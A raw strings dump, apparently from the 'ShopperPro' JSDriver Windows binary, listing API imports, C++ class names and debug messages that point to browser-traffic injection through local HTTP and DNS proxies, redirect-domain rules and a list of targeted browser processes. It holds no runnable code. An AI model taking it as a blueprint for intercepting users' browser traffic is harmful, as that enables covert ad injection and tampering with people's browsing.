f:\dd\vctools\crt_bld\self_x86\crt\src\a_env.c
f:\dd\vctools\crt_bld\self_x86\crt\src\ioinit.c
f:\dd\vctools\crt_bld\self_x86\crt\src\gmtime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\tzset.c
f:\dd\vctools\crt_bld\self_x86\crt\src\input.c
f:\dd\vctools\crt_bld\self_x86\crt\src\drive.c
Broken pipe
Inappropriate I/O control operation
Operation not permitted
f:\dd\vctools\crt_bld\self_x86\crt\src\inittime.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initnum.c
f:\dd\vctools\crt_bld\self_x86\crt\src\initmon.c
portuguese-brazilian
operator
f:\dd\vctools\crt_bld\self_x86\crt\src\_getbuf.c
f:\dd\vctools\crt_bld\self_x86\crt\src\osfinfo.c
f:\dd\vctools\crt_bld\self_x86\crt\src\wtombenv.c
f:\dd\vctools\crt_bld\self_x86\crt\src\setenv.c
ICACLS.EXE
SOFTWARE\%s
Global\%s_CONFIG_XML
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
Injector dump %s: %s
inj_rem remain %d
inj_loc remain %d
%s PutChunk send %d bytes to server
%s PutChunk send %d bytes to client
%s close pRemoteInj
%s close pLocalInj
New EmuSession flow %lld, now %d
Injector: Flow %lld, create session %X
Injector: Flow %lld, FDM=%d (%d)
%s ConnectedToVA, pLocalInj %p, pLocalVA %p
Delete EmuSession flow %lld, remain %d, chunks %d
%s delete Session %X
%s HandleChunk FWPS_STREAM_FLAG_SEND len %d
%s HandleChunk FWPS_STREAM_FLAG_RECEIVE len %d
%s HandleChunk FWPS_STREAM_FLAG_RECEIVE_DISCONNECT
%s HandleChunk FWPS_STREAM_FLAG_SEND_DISCONNECT
%s HandleChunk FWPS_STREAM_FLAG_ABORT
Injector: FDM=%d (%d)
%s ConnectToInj, Session not found pLocalVA %X
%s ConnectToInj
Cleanup %s
allports
iexplore.exe firefox.exe chrome.exe opera.exe webkit2webprocess.exe navigator.exe torch.exe u.exe epic.exe browser.exe maxthon.exe sbrender.exe vantvw.exe dragon.exe
[Stproxy]: open driver HANDLE %p, err %d
jsdriver: LoadConfig: error parsing Config.json
parsing Config.json
IOCTL_ENABLE_INTERCEPT res %d
SetThreadPriority %d
error %d
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xiosbase
0123456789.eE- 
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xutility
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\streambuf
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\xlocnum
Windows NT 6.1
%s?e=%s
zvl=%s&
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Content-Type: multipart/form-data; boundary=%s
HTTP/1.1
XXX
Software\Microsoft\Windows\CurrentVersion\Internet Settings
%s\%s
C:\Builds\Build_ShopperProMulti\JSDriver\1.42.0.0\JsDriver\Release\jsdrv.pdb
WSAJoinLeaf
WS2_32.dll
VERSION.dll
USERENV.dll
HttpQueryInfoA
InternetOpenUrlA
InternetCrackUrlA
HttpSendRequestA
HttpAddRequestHeadersA
HttpOpenRequestA
HttpSendRequestExA
HttpEndRequestA
WININET.dll
GetProcessHeap
GetCPInfo
PeekNamedPipe
KERNEL32.dll
MsgWaitForMultipleObjectsEx
CloseWindowStation
SetProcessWindowStation
OpenWindowStationA
USER32.dll
RegNotifyChangeKeyValue
RegOpenKeyExA
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegOpenKeyA
RegEnumKeyA
RegEnumKeyExA
RegQueryInfoKeyA
ADVAPI32.dll
ShellExecuteA
SHELL32.dll
.?AVIPipeEventsThread@@
.?AVCPipeEventThread@@
.?AVSaveWatchUrl@@
.?AVIHttpEngineConfiguration@@
.?AV?$CBaseInterface@VHttpEngineConfiguration@@VIHttpEngineConfiguration@@@@
.?AVHttpEngineConfiguration@@
.?AV?$CAsyncServer@VCDnsProxyServer@@VCAsyncUdpSocket@@@@
.?AVCEventsList@?$CAsyncServer@VCDnsProxyServer@@VCAsyncUdpSocket@@@@
.?AV?$CAsyncUdpSocketServer@VCDnsProxyServer@@VCAsyncUdpSocket@@@@
HTTP://
.?AV?$IMultiBaseInterface@VIPipeEventThreadManagerFactory@@@@
.?AVIPipeEventThreadManagerFactory@@
.?AV?$CMultiBaseInterface@VCPipeEventThreadManagerFactory@@VIPipeEventThreadManagerFactory@@@@
.?AVCPipeEventThreadManagerFactory@@
.?AVCAsyncUdpSocket@@
.?AVCExecuteUpdate@@
..\Common\Base64.cpp
..\Common\Base64MultiBytes.cpp
<>"#%{}|\^~[]`' ?&
<>"#{}|\^~[]`' ?&
.?AVIHttpProxyWorker@@
.?AV?$IBaseInterface@VIInjHttpProxyServer@@@@
.?AVIInjHttpProxyServer@@
.?AV?$CBaseInterface@VInjHttpProxyServer@@VIInjHttpProxyServer@@@@
.?AV?$IBaseInterface@VIHttpProxyServer@@@@
.?AVIHttpProxyServer@@
.?AVInjHttpProxyServer@@
.?AVHttpProxyServer@@
.?AV?$CBaseInterface@VHttpProxyServer@@VIHttpProxyServer@@@@
.?AVIHttpStreamSink@@
.?AVIHttpFileDownloadMgr@@
.?AVInjHttpProxyLocal@@
.?AVHttpProxyLocal@@
.?AVHttpProxyWorker@@
.?AVInjHttpProxyRemote@@
.?AVHttpProxyRemote@@
.?AVHttpParser@@
VA_SUBJECT_FMD_%d_WORKER_CREATED
VA_SUBJECT_FMD_%d_RANGE_CREATED
VA_SUBJECT_FMD_%d
VA_SUBJECT_FMD_%d_WORKER_%d
.?AVHttpCookie@@
.?AVHttpCookieJar@@
.?AV?$IBaseInterface@VIHttpCacheManager@@@@
.?AVIHttpCacheManager@@
.?AV?$CBaseInterface@VCHttpCacheManager@@VIHttpCacheManager@@@@
.?AVCHttpCacheManager@@
.?AVCProxyServerPassThrough@@
.?AVCHttpCacheData@@
zcÁ
.?AVCHttpAsync@@
.?AVCHttp@@
1.0.1.4
3.1.9318.1766
%Program Files% (x86)\ShopperPro\JSDriver\1.42.0.1766\jsdrv.exe
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2 2(2.242|2
<(<6<&?8?
;#<-<:<@<
6m6I6
2/2X2
5"535`6 7
1(1-121x1}1
y0~0 1%1U1Z1
99N9X9h9v9
6f6F6X6
7#767;7|7
0 1*131?1
<0=5=->2>
0%0U0Z0
3'41464;4}4
70858:8?8
>4?9?>?\?
969;9@9/:
3(4:4`498@8#:*:
7(>,>0>4>8><>
9 9$9(9,9094989<9
= =$=(=,=0=4=
;/;6;=;`;
? ?$?(?,?0?4?8?<?@?
9#:(:-:2:
9!9@9_9~9
2/2T2f2n2
77T7f7n7
0$0(0,0004080
6 6$6(64686
4 4$4(4,4044484<4@4
0 0$0(0,00040
4 4$4(4,4044484
7 7$7(7,7074787<7@7
,0004080<0
; ;$;(;,;0;4;8;
2 2$2(2,20242
3 3$3(3,3034383<3
5 5$5(5,505
= =(=,=0=4=
2,282\2|2
=$=,=8=\=|=
5$5,585\5|5
=,=8=\=|=
1(141<1\1
:$:,:8:\:|:
2 2$2(2,2024282`2
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,void *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,void *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,void *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,void *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,void *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,void *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,void *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,void *> >,0> > >::operator   
std::_List_const_iterator<class std::_List_val<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > >::operator   
std::_List_const_iterator<class std::_List_val<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > >::operator ==
std::_String_const_iterator<char,struct std::char_traits<char>,class std::allocator<char> >::operator --
dstd::_List_const_iterator<class std::_List_val<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > >::operator *
std::_List_const_iterator<class std::_List_val<class CImpersonateThread::CCreateProcessItem,class std::allocator<class CImpersonateThread::CCreateProcessItem> > >::operator ==
std::_List_const_iterator<class std::_List_val<void *,class std::allocator<void *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class CImpersonateThread::CCreateProcessItem,class std::allocator<class CImpersonateThread::CCreateProcessItem> > >::operator   
std::_List_const_iterator<class std::_List_val<void *,class std::allocator<void *> > >::operator   
std::_List_const_iterator<class std::_List_val<class CImpersonateThread::CCreateProcessItem,class std::allocator<class CImpersonateThread::CCreateProcessItem> > >::operator *
std::_List_const_iterator<class std::_List_val<void *,class std::allocator<void *> > >::operator *
std::_Vector_const_iterator<class std::_Vector_val<struct _WSAPROTOCOL_INFOW,class std::allocator<struct _WSAPROTOCOL_INFOW> > >::operator *
std::_Vector_const_iterator<class std::_Vector_val<struct _WSAPROTOCOL_INFOW,class std::allocator<struct _WSAPROTOCOL_INFOW> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class EVENT_ENTRY,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class EVENT_ENTRY> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class EVENT_ENTRY,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class EVENT_ENTRY> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,unsigned long,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,unsigned long> >,0> > >::operator ==
std::_List_const_iterator<class std::_List_val<class EVENT_ENTRY,class std::allocator<class EVENT_ENTRY> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,unsigned long,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,unsigned long> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class EVENT_ENTRY,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class EVENT_ENTRY> >,0> > >::operator   
std::_List_const_iterator<class std::_List_val<class EVENT_ENTRY,class std::allocator<class EVENT_ENTRY> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,unsigned long,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,unsigned long> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class EVENT_ENTRY,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class EVENT_ENTRY> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,unsigned long,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,unsigned long> >,0> > >::operator --
std::_List_const_iterator<class std::_List_val<class CCommandsQueueItem *,class std::allocator<class CCommandsQueueItem *> > >::operator   
std::_List_const_iterator<class std::_List_val<class CCommandsQueueItem *,class std::allocator<class CCommandsQueueItem *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator --
std::_List_const_iterator<class std::_List_val<struct _FILTER_CONN_INFO,class std::allocator<struct _FILTER_CONN_INFO> > >::operator   
std::_List_const_iterator<class std::_List_val<struct _FILTER_CONN_INFO,class std::allocator<struct _FILTER_CONN_INFO> > >::operator ==
std::_List_const_iterator<class std::_List_val<struct _RedirectDomainRuleDetails *,class std::allocator<struct _RedirectDomainRuleDetails *> > >::operator   
std::_List_const_iterator<class std::_List_val<struct _RedirectDomainRuleDetails *,class std::allocator<struct _RedirectDomainRuleDetails *> > >::operator ==
std::_Vector_const_iterator<class std::_Vector_val<unsigned long,class std::allocator<unsigned long> > >::operator *
std::_Vector_const_iterator<class std::_Vector_val<unsigned long,class std::allocator<unsigned long> > >::operator   
std::_List_const_iterator<class std::_List_val<struct _FILTER_CONN_INFO,class std::allocator<struct _FILTER_CONN_INFO> > >::operator *
std::_List_const_iterator<class std::_List_val<struct _RedirectDomainRuleDetails *,class std::allocator<struct _RedirectDomainRuleDetails *> > >::operator *
std::_List_const_iterator<class std::_List_val<char *,class std::allocator<char *> > >::operator   
std::_List_const_iterator<class std::_List_val<char *,class std::allocator<char *> > >::operator ==
std::_List_const_iterator<class std::_List_val<unsigned long,class std::allocator<unsigned long> > >::operator   
std::_List_const_iterator<class std::_List_val<unsigned long,class std::allocator<unsigned long> > >::operator ==
std::_List_const_iterator<class std::_List_val<char *,class std::allocator<char *> > >::operator --
std::_List_const_iterator<class std::_List_val<class ISocket *,class std::allocator<class ISocket *> > >::operator   
std::_List_const_iterator<class std::_List_val<class ISocket *,class std::allocator<class ISocket *> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISocket *,class CAsyncServer<class CDnsProxyServer,class CAsyncUdpSocket>::CEventsList *,struct std::less<class ISocket *>,class std::allocator<struct std::pair<class ISocket * const,class CAsyncServer<class CDnsProxyServer,class CAsyncUdpSocket>::CEventsList *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISocket *,class CAsyncServer<class CDnsProxyServer,class CAsyncUdpSocket>::CEventsList *,struct std::less<class ISocket *>,class std::allocator<struct std::pair<class ISocket * const,class CAsyncServer<class CDnsProxyServer,class CAsyncUdpSocket>::CEventsList *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<void *,class ISocket *,struct std::less<void *>,class std::allocator<struct std::pair<void * const,class ISocket *> >,0> > >::operator ==
std::_List_const_iterator<class std::_List_val<char *,class std::allocator<char *> > >::operator *
std::_List_const_iterator<class std::_List_val<unsigned long,class std::allocator<unsigned long> > >::operator *
std::_List_const_iterator<class std::_List_val<class ISocket *,class std::allocator<class ISocket *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISocket *,class CAsyncServer<class CDnsProxyServer,class CAsyncUdpSocket>::CEventsList *,struct std::less<class ISocket *>,class std::allocator<struct std::pair<class ISocket * const,class CAsyncServer<class CDnsProxyServer,class CAsyncUdpSocket>::CEventsList *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<void *,class ISocket *,struct std::less<void *>,class std::allocator<struct std::pair<void * const,class ISocket *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<void *,class ISocket *,struct std::less<void *>,class std::allocator<struct std::pair<void * const,class ISocket *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class ISocket *,class CAsyncServer<class CDnsProxyServer,class CAsyncUdpSocket>::CEventsList *,struct std::less<class ISocket *>,class std::allocator<struct std::pair<class ISocket * const,class CAsyncServer<class CDnsProxyServer,class CAsyncUdpSocket>::CEventsList *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<void *,class ISocket *,struct std::less<void *>,class std::allocator<struct std::pair<void * const,class ISocket *> >,0> > >::operator --
std::_List_const_iterator<class std::_List_val<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::list<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > *,class NoCaseStringCmp,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::list<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::list<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > *,class NoCaseStringCmp,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::list<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::list<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > *,class NoCaseStringCmp,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::list<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > *> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::list<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > *,class NoCaseStringCmp,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::list<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > > *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int const ,class CAcceleratorEventsData *,struct std::less<unsigned int const >,class std::allocator<struct std::pair<unsigned int const ,class CAcceleratorEventsData *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int const ,class CAcceleratorEventsData *,struct std::less<unsigned int const >,class std::allocator<struct std::pair<unsigned int const ,class CAcceleratorEventsData *> >,0> > >::operator ==
std::_List_const_iterator<class std::_List_val<class CAcceleratorEventsData *,class std::allocator<class CAcceleratorEventsData *> > >::operator ==
std::_List_const_iterator<class std::_List_val<class CAcceleratorEventsData *,class std::allocator<class CAcceleratorEventsData *> > >::operator   
]std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int const ,class CAcceleratorEventsData *,struct std::less<unsigned int const >,class std::allocator<struct std::pair<unsigned int const ,class CAcceleratorEventsData *> >,0> > >::operator   
std::_List_const_iterator<class std::_List_val<class CAcceleratorEventsData *,class std::allocator<class CAcceleratorEventsData *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned int const ,class CAcceleratorEventsData *,struct std::less<unsigned int const >,class std::allocator<struct std::pair<unsigned int const ,class CAcceleratorEventsData *> >,0> > >::operator --
std::vector<struct hostent *,class std::allocator<struct hostent *> >::operator []
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tset_traits<void *,struct std::less<void *>,class std::allocator<void *>,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,long,struct std::less<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<struct std::pair<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > const ,long> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,long,struct std::less<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<struct std::pair<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > const ,long> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tset_traits<void *,struct std::less<void *>,class std::allocator<void *>,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,long,struct std::less<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<struct std::pair<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > const ,long> >,0> > >::operator   
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<unsigned long,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,struct std::less<unsigned long>,class std::allocator<struct std::pair<unsigned long const ,class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> >,long,struct std::less<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::allocator<struct std::pair<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > const ,long> >,0> > >::operator --
std::_List_const_iterator<class std::_List_val<struct _OVERLAPPED_IO *,class std::allocator<struct _OVERLAPPED_IO *> > >::operator   
std::_List_const_iterator<class std::_List_val<struct _OVERLAPPED_IO *,class std::allocator<struct _OVERLAPPED_IO *> > >::operator ==
std::_List_const_iterator<class std::_List_val<struct _OVERLAPPED_IO *,class std::allocator<struct _OVERLAPPED_IO *> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class CProductRegisterInfo *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class CProductRegisterInfo *> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class CProductRegisterInfo *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class CProductRegisterInfo *> >,0> > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class CProductRegisterInfo *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class CProductRegisterInfo *> >,0> > >::operator --
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class CProductRegisterInfo *,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class CProductRegisterInfo *> >,0> > >::operator   
std::_List_const_iterator<class std::_List_val<struct PostData,class std::allocator<struct PostData> > >::operator   
std::_List_const_iterator<class std::_List_val<struct PostData,class std::allocator<struct PostData> > >::operator ==
std::_List_const_iterator<class std::_List_val<struct PostData,class std::allocator<struct PostData> > >::operator *
std::_List_const_iterator<class std::_List_val<struct std::pair<char *,unsigned int>,class std::allocator<struct std::pair<char *,unsigned int> > > >::operator   
std::_List_const_iterator<class std::_List_val<struct std::pair<char *,unsigned int>,class std::allocator<struct std::pair<char *,unsigned int> > > >::operator *
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,unsigned int,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,unsigned int> >,0> > >::operator ==
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > > >,0> > >::operator ==
std::_Deque_const_iterator<class json::UnknownElement,class std::allocator<class json::UnknownElement> >::operator  =
std::_Tree_const_iterator<class std::_Tree_val<class std::_Tmap_traits<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > >,unsigned int,struct std::less<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > >,class std::allocator<struct std::pair<class std::tstring<class std::basic_string<char,struct std::char_traits<char>,class std::allocator<char> > > const ,unsigned int> >,1> > >::operator ==
std::_Deque_const_iterator<class json::UnknownElement,class std::allocator<class json::UnknownElement> >::operator --
std::_Vector_const_iterator<class std::_Vector_val<class std::tr1::sub_match<char const *>,class std::allocator<class std::tr1::sub_match<char const *> > > >::operator  =
%Program Files% (x86)\Microsoft Visual Studio 10.0\VC\include\regex
